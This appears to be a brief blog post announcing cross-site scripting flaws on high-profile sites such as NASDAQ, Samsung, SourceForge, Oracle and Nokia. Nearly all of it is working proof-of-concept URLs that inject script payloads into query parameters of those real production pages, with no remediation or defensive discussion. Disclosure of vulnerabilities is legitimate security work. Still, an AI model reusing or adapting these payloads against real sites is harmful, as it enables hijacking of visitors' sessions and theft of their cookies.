Security Researcher 'Ankit Sharma' have discovered Cross site scripting vulnerability in lot of high profile sites .
NASDAQ, TECHNORATI,Conduit ,AddThis,AIRODUMP websites are found to be vulnerable to XSS. Also he found Samsung, Sourceforge ,oracle sites are vulnerable to this attack.
NASDAQ : http://stocksplits.nasdaq.com/UpcomingSplits.asp?pageName=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
TECHNORATI : http://technorati.com/search?return=posts&authority=high&q=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
CONDUIT : http://search.conduit.com/?ctid=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
ADDTHIS : http://www.addthis.com/services/all?a=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
AIRODUMP : http://download.airodump.net/datas/?dir=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
SAMSUNG : https://support-us.samsung.com/cyber/popup/pop_uploadmovie.jsp?symptom_movieid="><script>alert(document.cookie)</script>
SOURCEFORGE : http://marcion.sourceforge.net/dictionary/output.php?S=on&B=on&Sa=on&F=on&Sf=on&Fb=on&A=on&O=on&ssA=on&NH=on&und=on&exact=exact&word=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&search=search
ORACLE : http://tahiti.oracle.com/pls/db92/db92.show_toc?partno=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
NOKIA : http://beta.nokia.com/s40/nps/scripts/s40_nps.php?project_name=Ovi%20Browser&emailfield=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
0 comments:
Post a Comment